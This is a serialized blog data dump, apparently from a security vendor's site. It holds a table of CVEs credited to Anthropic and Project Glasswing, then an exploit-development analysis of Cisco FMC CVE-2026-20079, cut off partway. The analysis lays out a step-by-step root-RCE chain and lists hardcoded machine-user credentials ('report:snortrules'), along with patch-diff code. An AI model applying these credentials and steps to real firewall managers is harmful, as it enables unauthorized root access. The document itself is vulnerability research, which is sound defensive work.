Anthropic",[313,3704,3705,3708,3710,3712,3714,3716],{},[341,3706,3707],{},"CVE-2026-2764",[341,3709,3692],{},[341,3711,3069],{},[341,3713,3596],{},[341,3715,3699],{},[341,3717,3702],{},[313,3719,3720,3723,3725,3727,3729,3731],{},[341,3721,3722],{},"CVE-2026-2765",[341,3724,3692],{},[341,3726,3069],{},[341,3728,3596],{},[341,3730,3699],{},[341,3732,3702],{},[313,3734,3735,3738,3740,3742,3744,3746],{},[341,3736,3737],{},"CVE-2026-2766",[341,3739,3692],{},[341,3741,3069],{},[341,3743,3596],{},[341,3745,3699],{},[341,3747,3702],{},[313,3749,3750,3753,3755,3757,3759,3762],{},[341,3751,3752],{},"CVE-2026-2769",[341,3754,3692],{},[341,3756,3069],{},[341,3758,3596],{},[341,3760,3761],{},"8.8",[341,3763,3702],{},[313,3765,3766,3769,3771,3773,3775,3777],{},[341,3767,3768],{},"CVE-2026-2770",[341,3770,3692],{},[341,3772,3069],{},[341,3774,3596],{},[341,3776,3761],{},[341,3778,3702],{},[313,3780,3781,3784,3786,3788,3790,3792],{},[341,3782,3783],{},"CVE-2026-2771",[341,3785,3692],{},[341,3787,3069],{},[341,3789,3596],{},[341,3791,3699],{},[341,3793,3702],{},[313,3795,3796,3799,3801,3803,3805,3807],{},[341,3797,3798],{},"CVE-2026-2772",[341,3800,3692],{},[341,3802,3069],{},[341,3804,3596],{},[341,3806,3761],{},[341,3808,3702],{},[313,3810,3811,3814,3816,3818,3820,3822],{},[341,3812,3813],{},"CVE-2026-2773",[341,3815,3692],{},[341,3817,3069],{},[341,3819,3596],{},[341,3821,3699],{},[341,3823,3702],{},[313,3825,3826,3829,3831,3833,3835,3837],{},[341,3827,3828],{},"CVE-2026-2774",[341,3830,3692],{},[341,3832,3069],{},[341,3834,3596],{},[341,3836,3761],{},[341,3838,3702],{},[313,3840,3841,3844,3846,3848,3850,3852],{},[341,3842,3843],{},"CVE-2026-2775",[341,3845,3692],{},[341,3847,3069],{},[341,3849,3596],{},[341,3851,3699],{},[341,3853,3702],{},[313,3855,3856,3859,3861,3863,3865,3867],{},[341,3857,3858],{},"CVE-2026-2785",[341,3860,3692],{},[341,3862,3069],{},[341,3864,3596],{},[341,3866,3761],{},[341,3868,3702],{},[313,3870,3871,3874,3876,3878,3880,3882],{},[341,3872,3873],{},"CVE-2026-2786",[341,3875,3692],{},[341,3877,3069],{},[341,3879,3596],{},[341,3881,3761],{},[341,3883,3702],{},[313,3885,3886,3889,3891,3893,3895,3897],{},[341,3887,3888],{},"CVE-2026-2787",[341,3890,3692],{},[341,3892,3069],{},[341,3894,3596],{},[341,3896,3761],{},[341,3898,3702],{},[313,3900,3901,3904,3906,3908,3910,3912],{},[341,3902,3903],{},"CVE-2026-2788",[341,3905,3692],{},[341,3907,3069],{},[341,3909,3596],{},[341,3911,3699],{},[341,3913,3702],{},[313,3915,3916,3919,3921,3923,3925,3927],{},[341,3917,3918],{},"CVE-2026-2789",[341,3920,3692],{},[341,3922,3069],{},[341,3924,3596],{},[341,3926,3761],{},[341,3928,3702],{},[313,3930,3931,3934,3936,3938,3940,3942],{},[341,3932,3933],{},"CVE-2026-2791",[341,3935,3692],{},[341,3937,3069],{},[341,3939,3596],{},[341,3941,3699],{},[341,3943,3702],{},[313,3945,3946,3949,3951,3953,3955,3957],{},[341,3947,3948],{},"CVE-2026-2796",[341,3950,3692],{},[341,3952,3069],{},[341,3954,3596],{},[341,3956,3699],{},[341,3958,3702],{},[313,3960,3961,3964,3966,3968,3970,3972],{},[341,3962,3963],{},"CVE-2026-2797",[341,3965,3692],{},[341,3967,3069],{},[341,3969,3596],{},[341,3971,3761],{},[341,3973,3702],{},[313,3975,3976,3979,3981,3983,3985,3987],{},[341,3977,3978],{},"CVE-2026-2799",[341,3980,3692],{},[341,3982,3069],{},[341,3984,3596],{},[341,3986,3761],{},[341,3988,3702],{},[313,3990,3991,3994,3996,3998,4000,4003],{},[341,3992,3993],{},"CVE-2026-2804",[341,3995,3692],{},[341,3997,3069],{},[341,3999,3596],{},[341,4001,4002],{},"5.4",[341,4004,3702],{},[313,4006,4007,4010,4012,4014,4016,4018],{},[341,4008,4009],{},"CVE-2026-2805",[341,4011,3692],{},[341,4013,3069],{},[341,4015,3596],{},[341,4017,3699],{},[341,4019,3702],{},[313,4021,4022,4025,4028,4030,4032,4034],{},[341,4023,4024],{},"CVE-2026-4702",[341,4026,4027],{},"2026-03-24",[341,4029,3069],{},[341,4031,3596],{},[341,4033,3699],{},[341,4035,3702],{},[313,4037,4038,4041,4043,4045,4047,4050],{},[341,4039,4040],{},"CVE-2026-4704",[341,4042,4027],{},[341,4044,3069],{},[341,4046,3596],{},[341,4048,4049],{},"7.5",[341,4051,3702],{},[313,4053,4054,4057,4059,4061,4063,4065],{},[341,4055,4056],{},"CVE-2026-4705",[341,4058,4027],{},[341,4060,3069],{},[341,4062,3596],{},[341,4064,3699],{},[341,4066,3702],{},[313,4068,4069,4072,4074,4076,4078,4081],{},[341,4070,4071],{},"CVE-2026-4718",[341,4073,4027],{},[341,4075,3069],{},[341,4077,3596],{},[341,4079,4080],{},"8.1",[341,4082,3702],{},[313,4084,4085,4088,4090,4092,4094,4096],{},[341,4086,4087],{},"CVE-2026-4723",[341,4089,4027],{},[341,4091,3069],{},[341,4093,3596],{},[341,4095,3699],{},[341,4097,3702],{},[313,4099,4100,4103,4105,4107,4109,4112],{},[341,4101,4102],{},"CVE-2026-4724",[341,4104,4027],{},[341,4106,3069],{},[341,4108,3596],{},[341,4110,4111],{},"9.1",[341,4113,3702],{},[313,4115,4116,4119,4121,4123,4125,4128],{},[341,4117,4118],{},"CVE-2026-27654",[341,4120,4027],{},[341,4122,3613],{},[341,4124,3616],{},[341,4126,4127],{},"8.2",[341,4129,4130],{},"Calif.io in collaboration with Claude and Anthropic Research",[313,4132,4133,4136,4139,4141,4143,4145],{},[341,4134,4135],{},"CVE-2026-4747",[341,4137,4138],{},"2026-03-26",[341,4140,3623],{},[341,4142,3623],{},[341,4144,3761],{},[341,4146,4147],{},"Nicholas Carlini using Claude, Anthropic",[313,4149,4150,4153,4156,4158,4160,4162],{},[341,4151,4152],{},"CVE-2026-28386",[341,4154,4155],{},"2026-04-07",[341,4157,3632],{},[341,4159,3632],{},[341,4161,4111],{},[341,4163,4164],{},"Stanislav Fort (Aisle Research); Pavel Kohout (Aisle Research); Alex Gaynor (Anthropic)",[313,4166,4167,4170,4173,4175,4177,4180],{},[341,4168,4169],{},"CVE-2026-5194",[341,4171,4172],{},"2026-04-09",[341,4174,3604],{},[341,4176,3604],{},[341,4178,4179],{},"9.3",[341,4181,4182],{},"Nicholas Carlini from Anthropic",[313,4184,4185,4188,4190,4192,4194,4197],{},[341,4186,4187],{},"CVE-2026-5446",[341,4189,4172],{},[341,4191,3604],{},[341,4193,3604],{},[341,4195,4196],{},"6.0",[341,4198,4130],{},[313,4200,4201,4204,4206,4208,4210,4213],{},[341,4202,4203],{},"CVE-2026-5503",[341,4205,4172],{},[341,4207,3604],{},[341,4209,3604],{},[341,4211,4212],{},"6.9",[341,4214,4130],{},[313,4216,4217,4220,4222,4224,4226,4229],{},[341,4218,4219],{},"CVE-2026-5447",[341,4221,4172],{},[341,4223,3604],{},[341,4225,3604],{},[341,4227,4228],{},"6.3",[341,4230,4130],{},[313,4232,4233,4236,4239,4241,4243,4246],{},[341,4234,4235],{},"CVE-2026-5466",[341,4237,4238],{},"2026-04-10",[341,4240,3604],{},[341,4242,3604],{},[341,4244,4245],{},"7.6",[341,4247,4130],{},[313,4249,4250,4253,4255,4257,4259,4261],{},[341,4251,4252],{},"CVE-2026-5477",[341,4254,4238],{},[341,4256,3604],{},[341,4258,3604],{},[341,4260,4127],{},[341,4262,4130],{},[313,4264,4265,4268,4270,4272,4274,4276],{},[341,4266,4267],{},"CVE-2026-5479",[341,4269,4238],{},[341,4271,3604],{},[341,4273,3604],{},[341,4275,4245],{},[341,4277,4130],{},[313,4279,4280,4283,4285,4287,4289,4292],{},[341,4281,4282],{},"CVE-2026-5500",[341,4284,4238],{},[341,4286,3604],{},[341,4288,3604],{},[341,4290,4291],{},"8.7",[341,4293,4130],{},[313,4295,4296,4299,4301,4303,4305,4308],{},[341,4297,4298],{},"CVE-2026-5501",[341,4300,4238],{},[341,4302,3604],{},[341,4304,3604],{},[341,4306,4307],{},"8.6",[341,4309,4130],{},[18,4311,4312],{},"CVEs Added Post Blog Publication",[307,4314,4315,4331],{},[310,4316,4317],{},[313,4318,4319,4321,4323,4325,4327,4329],{},[316,4320,3669],{},[316,4322,3672],{},[316,4324,3581],{},[316,4326,3584],{},[316,4328,3679],{},[316,4330,3682],{},[336,4332,4333],{},[313,4334,4335,4338,4340,4343,4346,4348],{},[341,4336,4337],{},"CVE-2026-5588",[341,4339,3483],{},[341,4341,4342],{},"Legion of the Bouncy Castle Inc.",[341,4344,4345],{},"BC-JAVA",[341,4347,4228],{},[341,4349,4147],{},[61,4351,4353],{"id":4352},"what-vulnerabilities-are-directly-attributable-to-glasswing","What Vulnerabilities Are Directly Attributable to Glasswing?",[18,4355,4356],{},"Despite the attention around Glasswing, only one publicly disclosed CVE can currently be directly tied to it. CVE-2026-4747 (FreeBSD NFS RCE) is explicitly attributed to Glasswing and Mythos Preview by name, described as fully autonomously identified and exploited.",[18,4358,4359],{},"The Glasswing page also references three vulnerabilities without CVE numbers: a 27-year-old OpenBSD flaw, a 16-year-old FFmpeg bug, and Linux kernel privilege escalation chains. All three are still under embargo pending patches.",[18,4361,4362],{},"The broader limitation is that Anthropic committed the details of additional findings via cryptographic hashes prior to public disclosure as they are currently under embargo until a patch is released and the vulnerability is publicly disclosed. The full picture won't be known until public disclosure takes place and Anthropic has indicated a public summary report is expected around July 2026.",[18,4364,4365,4366,59],{},"The July 2026 report will be the real tell. When Anthropic follows through with a full public accounting of what Glasswing found and fixed, it will provide broader visibility into the details you might be looking for. Until then, the best signals available are the CVE credits field and Anthropic's own advisories at ",[47,4367,3555],{"href":3553,"rel":4368},[51],[61,4370,4372],{"id":4371},"considerations-for-anthropic","Considerations for Anthropic",[18,4374,4375],{},"It would be beneficial for Anthropic to create a dedicated security advisory page where security advisories and vulnerability disclosures were published in a consistent way, to provide a way for consumers to understand the question: what vulnerabilities have been discovered by the Anthropic research team and Project Glasswing?",[61,4377,202],{"id":201},[18,4379,205],{},[18,4381,208],{},[18,4383,211,4384,217],{},[47,4385,216],{"href":214,"rel":4386},[51],{"title":219,"searchDepth":220,"depth":220,"links":4388},[4389,4390,4391,4392,4393,4394,4395],{"id":3520,"depth":220,"text":20},{"id":3540,"depth":220,"text":3541},{"id":3559,"depth":220,"text":3560},{"id":3653,"depth":220,"text":3654},{"id":4352,"depth":220,"text":4353},{"id":4371,"depth":220,"text":4372},{"id":201,"depth":220,"text":202},"2026-04-15T10:00:00-05:00","A primary source breakdown of every CVE publicly credited to Anthropic researchers and Project Glasswing, based on a full search of the CVE record database.",{"slug":4399},"anthropic-glasswing-cves","\u002Fblog\u002Fanthropic-glasswing-cves",{"title":3477,"description":4397},"blog\u002Fanthropic-glasswing-cves",[242,243],"1H6hc1aWEZKVKkJ3iEcdi_3kYV_LUNB-4wAe5zqkcEE",{"id":4406,"title":4407,"articles":7,"authors":4408,"body":4414,"date":10377,"description":10378,"extension":234,"image":7,"link":7,"meta":10379,"navigation":237,"path":10381,"seo":10382,"series":7,"stem":10383,"subtype":7,"tags":10384,"__hash__":10385},"blog\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079.md","CVE-2026-20079 - Cisco FMC Authentication Bypass RCE Analysis",[4409],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},"Cale Black","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U072UD3MW56-12d631dac54f-512","https:\u002F\u002Fhosakacorp.net","hosakacorp.net",{"type":15,"value":4415,"toc":10365},[4416,4419,4433,4437,4448,4451,4507,4511,4514,4531,4538,4542,4550,4558,4565,4576,4579,4582,4589,4607,4613,4619,4955,4961,4967,5017,5031,5035,5042,5346,5353,5360,5370,5621,5631,5652,5655,6223,6226,6248,6266,6273,6337,6526,6536,6595,6785,6791,6794,6800,6804,6807,6813,6816,6857,6883,6886,6893,6902,6927,6937,7104,7126,7225,7246,7252,7256,7275,7725,7735,7748,7764,7868,7883,8215,8226,8604,8617,8621,8624,8692,8703,8769,8830,8922,8925,8945,9096,9099,9239,9248,9275,9278,9361,9490,9494,9513,9965,9978,10109,10112,10289,10301,10307,10317,10326,10328,10345,10362],[263,4417],{":list":4418,"ico":266,"title":20},"[\"CVE-2026-20079 is a CVSS 10.0 RCE vulnerability in Cisco Secure Firewall Management Center\",\"VulnCheck's Initial Access Intelligence team developed an exploit that proved the vulnerability is exploitable but has significant prerequisites\",\"In this blog, our team walks through practical exploit development steps and the hurdles we encountered along the way\"]",[18,4420,4421,4422,4427,4428,4432],{},"On March 4, 2026, Cisco published an advisory for CVE-2026-20079, a CVSS 10.0 vulnerability in Cisco Secure Firewall Management Center (FMC). Since Cisco networking gear tends to be a common adversary target, our Initial Access Intelligence team’s interest was immediately piqued. Censys ",[47,4423,4426],{"href":4424,"rel":4425},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.headers%3A%28key%3D%22Server%22+and+value%3A%22Mojolicious+%28Perl%29%22%29+and+host.services.endpoints.http.body%3A%22Management+Center%22+and+host.services.endpoints.http.body%3A%22%2Fimg%2Fcisco-icon.svg%22",[51],"finds"," about 300 Cisco FMC instances on the public internet, while FOFA ",[47,4429,4426],{"href":4430,"rel":4431},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=c2VydmVyPSJNb2pvbGljaW91cyAoUGVybCkiICYmIGJvZHk9Ik1hbmFnZW1lbnQgQ2VudGVyIiAmJiBib2R5PSIvaW1nL2Npc2NvLWljb24uc3ZnP3Yi",[51]," between 600 and 700 exposed systems. This blog goes into detail on the exploit development process for CVE-2026-20079, which was an unexpectedly wild ride.",[61,4434,4436],{"id":4435},"spoiler-the-end-result","Spoiler: The End Result",[18,4438,4439,4440,4443,4444,4447],{},"CVE-2026-20079 arises when a startup process on the FMC system creates a partial ",[886,4441,4442],{},"csm_processes"," session in the ",[886,4445,4446],{},"sfsnort.sessions"," database. If no users authenticate after the system boots, the session persists and can be upgraded into permissions usable by an attacker, who could then call a significant set of CGI scripts.",[18,4449,4450],{},"VulnCheck identified that certain scripts could be chained such that a low-privileged session ID could be upgraded into a UI login session, after which RCE is possible via a multi-step process:",[22,4452,4453,4458,4473,4479,4486,4500],{},[25,4454,2245,4455,4457],{},[886,4456,4442],{}," session is created in the database at boot and is marked as machine process with a static session ID, instead of a dynamic UUID like the rest of the system",[25,4459,2245,4460,4462,4463,4465,4466,4469,4470,59],{},[886,4461,4442],{}," session ID could be upgraded into a UI session via hardcoded credentials with the report user, which then uses the ",[886,4464,4442],{}," session UI permissions to allow authentication. This creates a set of required session parameters that are needed for accessing the API calls, namely ",[886,4467,4468],{},"sf_action_id",". The hardcoded machine user credentials are ",[886,4471,4472],{},"report:snortrules",[25,4474,4475,4476,4478],{},"The report user session is then granted the rights to view the UI pages containing the ",[886,4477,4468],{}," (no actual user privileges are assigned), which is extracted.",[25,4480,4481,4482,4485],{},"An arbitrary file write is conducted on sajaxintf.cgi via the all user-privileged validateLicense bulk AJAX API endpoint, which writes Unicode-escaped data to ",[886,4483,4484],{},"\u002Fvar\u002Ftmp\u002Flicense.tmp",". For the purposes of our exploit, we wrote a special shell script with the \"Makeself\" Cisco-defined format that utilizes several hardcoded strings.",[25,4487,4488,4489,4492,4493,4496,4497,4499],{},"The shell script that we wrote to license.tmp is then executed by calling the \"all\"-privileged allowed ",[886,4490,4491],{},"pjb.cgi"," endpoint with the ",[886,4494,4495],{},"SF::UI::DataObjectLibrary::upgradeReadinessCall"," and calling the ",[886,4498,4484],{}," shell script as the target.",[25,4501,4502,4503,4506],{},"The FMC system then processes the license.tmp file as an upgrade script and triggers an \"install\" process that ends up executing a ",[886,4504,4505],{},"SF::System::Wrappers::RunCmd"," Perl function that runs the script as root.",[993,4508,4510],{"id":4509},"exploitation-prerequisites","Exploitation Prerequisites",[18,4512,4513],{},"In order for the authentication bypass to succeed, the FMC host must have been rebooted, and the session must still exist in the database. Our team identified several instances where the required session will not be present, which would prevent exploitation until the system reboots. Any of the following may clear the injected session:",[22,4515,4516,4522,4525],{},[25,4517,4518,4519,4521],{},"Dashboard and widget interaction from authenticated users clears the \"old sessions,\" including the old ",[886,4520,4442],{}," session",[25,4523,4524],{},"Cloud managed sessions interactioning with the web UI",[25,4526,4527,4528,4530],{},"Periodic cleanups are triggered on account authentication, which happens sporadically for the automated ",[886,4529,4442],{}," user.",[18,4532,4533,4534,4537],{},"This means that it's likely the only time the target will be exploitable is shortly after boot, ",[1131,4535,4536],{},"or"," on systems that aren’t commonly interacted with or directly authenticated to the web UI.",[61,4539,4541],{"id":4540},"root-cause-analysis","Root Cause Analysis",[18,4543,2245,4544,4549],{},[47,4545,4548],{"href":4546,"rel":4547},"https:\u002F\u002Fsec.cloudapps.cisco.com\u002Fsecurity\u002Fcenter\u002Fcontent\u002FCiscoSecurityAdvisory\u002Fcisco-sa-onprem-fmc-authbypass-5JPp45V2",[51],"Cisco advisory"," for CVE-2026-20079 states that:",[1925,4551,4552,4555],{},[18,4553,4554],{},"A vulnerability in the web interface of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.",[18,4556,4557],{},"This vulnerability is due to an improper system process that is created at boot time. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute a variety of scripts and commands that allow root access to the device.",[18,4559,4560,4561,4564],{},"To our hacker ears this says very little, and by not saying a lot, the things it ",[1131,4562,4563],{},"does"," say matter a ton:",[22,4566,4567,4570],{},[25,4568,4569],{},"The boot time statement tells me that something is up with session handling at system boot time",[25,4571,4572,4573,4575],{},"The vulnerability’s being unauthenticated immediately tells me that the boot time process enabled some session manipulation to reach management scripts, ",[1131,4574,4536],{}," that some hard-coded process allows a set of known values to be manipulated into a real session.",[18,4577,4578],{},"The only way to know was to dig in.",[18,4580,4581],{},"After patch diffing, a few things became apparent: The FMC system was a complex set of APIs that used Apache HTTPD redirects and proxy rewrites to access a large set of Perl, Java, and Go services running on the host, and the changes related to CVE-2026-20079 were relatively small.",[18,4583,4584,4585,4588],{},"The primary changes were to the Apache HTTPD configuration file and to the ",[886,4586,4587],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FAuth.pm"," Perl Mojolicious CGI authentication handler, with a grand total of around 25 lines of code changed. Great, this should be easy, right? (This is a literary device called foreshadowing.)",[18,4590,4591,4592,4595,4596,4599,4600,4603,4604,4606],{},"The first change was to the ",[886,4593,4594],{},"httpsd_conf.tt"," template located at ",[886,4597,4598],{},"\u002FVolume\u002F7.7.12-3\u002Fsf\u002Fhtdocs\u002Ftemplates\u002Fhtml_templates\u002Fstig\u002Fhttpsd_conf.tt",". This is used as a template to generate the configuration for the Apache web service that functions as the main entry point for routing on FMC. The changes below show that the only addition was to add a check for whether the remote address is from the local system, and if it is, to set a ",[886,4601,4602],{},"X-Auth-User-Type"," header to ",[886,4605,467],{},":",[1354,4608,4611],{"className":4609,"code":4610,"language":1359},[1357],"SetEnvIf Remote_Addr ^127\\.0\\.0\\.1$|^::1$ request_is_local\nRequestHeader set X-Auth-User-Type 1 env=!request_is_local\n",[886,4612,4610],{"__ignoreMap":219},[18,4614,4615,4616,4618],{},"A corresponding addition was made to the Perl authentication handling library at ",[886,4617,4587],{},", which adds the following validation for the previously added header; if a session exists for an account and the header type does not match the expected user type, it will trigger an unauthorized error:",[1354,4620,4624],{"className":4621,"code":4622,"language":4623,"meta":219,"style":219},"language-perl shiki shiki-themes material-theme-lighter github-light github-dark monokai","# verify user type\nif ($session) {\n my $userTypeFromSession = $session->param('usertype');\n my $userTypeFromHeader;\n if (ref($q) eq 'Mojo::Message::Request') {\n $userTypeFromHeader = $q->headers->header('X-Auth-User-Type');\n } else {\n $userTypeFromHeader = $q->http('X-Auth-User-Type');\n }\n if (\n defined $userTypeFromHeader &&\n $userTypeFromHeader == AUTH_IS_USER &&\n defined $userTypeFromSession &&\n $userTypeFromSession != AUTH_IS_USER\n ) {\n my $username = $session->param('username');\n warn \"CheckLogin: Incorrect user type: $userTypeFromHeader != $userTypeFromSession ($username)\";\n return 0 if $hasReturnFlag;\n Unauthorized($q, $session);\n }\n}\n","perl",[886,4625,4626,4632,4648,4681,4690,4722,4754,4766,4790,4796,4804,4815,4823,4833,4841,4847,4875,4913,4929,4945,4950],{"__ignoreMap":219},[1373,4627,4628],{"class":1375,"line":1376},[1373,4629,4631],{"class":4630},"ss7Ak","# verify user type\n",[1373,4633,4634,4638,4642,4645],{"class":1375,"line":220},[1373,4635,4637],{"class":4636},"sRxSC","if",[1373,4639,4641],{"class":4640},"ss--_"," (",[1373,4643,4644],{"class":1383},"$",[1373,4646,4647],{"class":4640},"session) {\n",[1373,4649,4650,4654,4657,4660,4662,4665,4668,4671,4673,4676,4678],{"class":1375,"line":1266},[1373,4651,4653],{"class":4652},"sTNss"," my",[1373,4655,4656],{"class":1383}," $",[1373,4658,4659],{"class":4640},"userTypeFromSession = ",[1373,4661,4644],{"class":1383},[1373,4663,4664],{"class":4640},"session",[1373,4666,4667],{"class":1397},"->",[1373,4669,4670],{"class":4640},"param(",[1373,4672,1388],{"class":1387},[1373,4674,4675],{"class":1391},"usertype",[1373,4677,1388],{"class":1387},[1373,4679,4680],{"class":4640},");\n",[1373,4682,4683,4685,4687],{"class":1375,"line":1852},[1373,4684,4653],{"class":4652},[1373,4686,4656],{"class":1383},[1373,4688,4689],{"class":4640},"userTypeFromHeader;\n",[1373,4691,4693,4696,4698,4701,4703,4705,4708,4711,4714,4717,4719],{"class":1375,"line":4692},5,[1373,4694,4695],{"class":4636}," if",[1373,4697,4641],{"class":4640},[1373,4699,4700],{"class":1379},"ref",[1373,4702,1384],{"class":4640},[1373,4704,4644],{"class":1383},[1373,4706,4707],{"class":4640},"q) ",[1373,4709,4710],{"class":1379},"eq",[1373,4712,4713],{"class":1387}," '",[1373,4715,4716],{"class":1391},"Mojo::Message::Request",[1373,4718,1388],{"class":1387},[1373,4720,4721],{"class":4640},") {\n",[1373,4723,4725,4728,4731,4733,4736,4738,4741,4743,4746,4748,4750,4752],{"class":1375,"line":4724},6,[1373,4726,4727],{"class":1383}," $",[1373,4729,4730],{"class":4640},"userTypeFromHeader = ",[1373,4732,4644],{"class":1383},[1373,4734,4735],{"class":4640},"q",[1373,4737,4667],{"class":1397},[1373,4739,4740],{"class":4640},"headers",[1373,4742,4667],{"class":1397},[1373,4744,4745],{"class":4640},"header(",[1373,4747,1388],{"class":1387},[1373,4749,4602],{"class":1391},[1373,4751,1388],{"class":1387},[1373,4753,4680],{"class":4640},[1373,4755,4757,4760,4763],{"class":1375,"line":4756},7,[1373,4758,4759],{"class":4640}," } ",[1373,4761,4762],{"class":4636},"else",[1373,4764,4765],{"class":4640}," {\n",[1373,4767,4769,4771,4773,4775,4777,4779,4782,4784,4786,4788],{"class":1375,"line":4768},8,[1373,4770,4727],{"class":1383},[1373,4772,4730],{"class":4640},[1373,4774,4644],{"class":1383},[1373,4776,4735],{"class":4640},[1373,4778,4667],{"class":1397},[1373,4780,4781],{"class":4640},"http(",[1373,4783,1388],{"class":1387},[1373,4785,4602],{"class":1391},[1373,4787,1388],{"class":1387},[1373,4789,4680],{"class":4640},[1373,4791,4793],{"class":1375,"line":4792},9,[1373,4794,4795],{"class":4640}," }\n",[1373,4797,4799,4801],{"class":1375,"line":4798},10,[1373,4800,4695],{"class":4636},[1373,4802,4803],{"class":4640}," (\n",[1373,4805,4807,4810,4812],{"class":1375,"line":4806},11,[1373,4808,4809],{"class":1379}," defined",[1373,4811,4656],{"class":1383},[1373,4813,4814],{"class":4640},"userTypeFromHeader &&\n",[1373,4816,4818,4820],{"class":1375,"line":4817},12,[1373,4819,4727],{"class":1383},[1373,4821,4822],{"class":4640},"userTypeFromHeader == AUTH_IS_USER &&\n",[1373,4824,4826,4828,4830],{"class":1375,"line":4825},13,[1373,4827,4809],{"class":1379},[1373,4829,4656],{"class":1383},[1373,4831,4832],{"class":4640},"userTypeFromSession &&\n",[1373,4834,4836,4838],{"class":1375,"line":4835},14,[1373,4837,4727],{"class":1383},[1373,4839,4840],{"class":4640},"userTypeFromSession != AUTH_IS_USER\n",[1373,4842,4844],{"class":1375,"line":4843},15,[1373,4845,4846],{"class":4640}," ) {\n",[1373,4848,4850,4853,4855,4858,4860,4862,4864,4866,4868,4871,4873],{"class":1375,"line":4849},16,[1373,4851,4852],{"class":4652}," my",[1373,4854,4656],{"class":1383},[1373,4856,4857],{"class":4640},"username = ",[1373,4859,4644],{"class":1383},[1373,4861,4664],{"class":4640},[1373,4863,4667],{"class":1397},[1373,4865,4670],{"class":4640},[1373,4867,1388],{"class":1387},[1373,4869,4870],{"class":1391},"username",[1373,4872,1388],{"class":1387},[1373,4874,4680],{"class":4640},[1373,4876,4878,4881,4884,4887,4889,4892,4895,4897,4900,4902,4904,4906,4908,4910],{"class":1375,"line":4877},17,[1373,4879,4880],{"class":1379}," warn",[1373,4882,4883],{"class":1387}," \"",[1373,4885,4886],{"class":1391},"CheckLogin: Incorrect user type: ",[1373,4888,4644],{"class":1383},[1373,4890,4891],{"class":4640},"userTypeFromHeader",[1373,4893,4894],{"class":1391}," != ",[1373,4896,4644],{"class":1383},[1373,4898,4899],{"class":4640},"userTypeFromSession",[1373,4901,4641],{"class":1391},[1373,4903,4644],{"class":1383},[1373,4905,4870],{"class":4640},[1373,4907,2230],{"class":1391},[1373,4909,183],{"class":1387},[1373,4911,4912],{"class":4640},";\n",[1373,4914,4916,4919,4922,4924,4926],{"class":1375,"line":4915},18,[1373,4917,4918],{"class":4636}," return",[1373,4920,4921],{"class":4640}," 0 ",[1373,4923,4637],{"class":4636},[1373,4925,4656],{"class":1383},[1373,4927,4928],{"class":4640},"hasReturnFlag;\n",[1373,4930,4932,4935,4937,4940,4942],{"class":1375,"line":4931},19,[1373,4933,4934],{"class":4640}," Unauthorized(",[1373,4936,4644],{"class":1383},[1373,4938,4939],{"class":4640},"q, ",[1373,4941,4644],{"class":1383},[1373,4943,4944],{"class":4640},"session);\n",[1373,4946,4948],{"class":1375,"line":4947},20,[1373,4949,4795],{"class":4640},[1373,4951,4953],{"class":1375,"line":4952},21,[1373,4954,1855],{"class":4640},[18,4956,4957,4958,4530],{},"These two changes let us know that the authentication bug relates to the \"user type\" and that any interaction with the web UI will force the user type to be a specific value. This, in turn, means that the authentication bug likely has to do with a non-",[886,4959,4960],{},"AUTH_IS_USER",[18,4962,2245,4963,4966],{},[886,4964,4965],{},"Auth.pm"," file defines a set of user types:",[1354,4968,4970],{"className":4621,"code":4969,"language":4623,"meta":219,"style":219},"use constant AUTH_IS_NONE => 0;\nuse constant AUTH_IS_USER => 1;\nuse constant AUTH_IS_MACHINE => 2;\n",[886,4971,4972,4990,5003],{"__ignoreMap":219},[1373,4973,4974,4977,4980,4984,4987],{"class":1375,"line":1376},[1373,4975,4976],{"class":4636},"use",[1373,4978,4979],{"class":4640}," constant ",[1373,4981,4983],{"class":4982},"sHBcC","AUTH_IS_NONE",[1373,4985,4986],{"class":1397}," =>",[1373,4988,4989],{"class":4640}," 0;\n",[1373,4991,4992,4994,4996,4998,5000],{"class":1375,"line":220},[1373,4993,4976],{"class":4636},[1373,4995,4979],{"class":4640},[1373,4997,4960],{"class":4982},[1373,4999,4986],{"class":1397},[1373,5001,5002],{"class":4640}," 1;\n",[1373,5004,5005,5007,5009,5012,5014],{"class":1375,"line":1266},[1373,5006,4976],{"class":4636},[1373,5008,4979],{"class":4640},[1373,5010,5011],{"class":4982},"AUTH_IS_MACHINE",[1373,5013,4986],{"class":1397},[1373,5015,5016],{"class":4640}," 2;\n",[18,5018,5019,5020,5022,5023,1554,5025,5027,5028,5030],{},"So we also know that the vulnerability is likely related to the ",[886,5021,5011],{}," user type, as the Apache changes force the web server interaction into a ",[886,5024,467],{},[886,5026,4960],{}," state. Time to start hunting for the potential users and authentication mechanisms for the ",[886,5029,5011],{}," type.",[61,5032,5034],{"id":5033},"what-is-a-user-after-all","What is a User After All?",[18,5036,5037,5038,5041],{},"After searching the Perl code base and checking the database, we identified that the following are hardcoded user credentials that are extracted from the ",[886,5039,5040],{},"\u002FVolume\u002F7.7.11-1061\u002Fsf\u002Fbin\u002Frepair_users.pl"," script:",[1354,5043,5045],{"className":4621,"code":5044,"language":4623,"meta":219,"style":219},"# Now create other system users\ncreate_user(\"report\", \"ReportUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"report\", \"snortrules\");\ncreate_user(\"sftop10user\", \"Top10User\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"sftop10user\", \"snortrules\");\ncreate_user(\"SRU\", \"SRUuser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"SRU\", \"snortrules\");\ncreate_user(\"Sourcefire\", \"SourcefireUser\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"Sourcefire\", \"snortrules\");\ncreate_user(\"csm_processes\", \"csm_processes\", \"none\", \"none\", SF::Auth::AUTH_IS_MACHINE, 0);\nchange_password(\"csm_processes\", 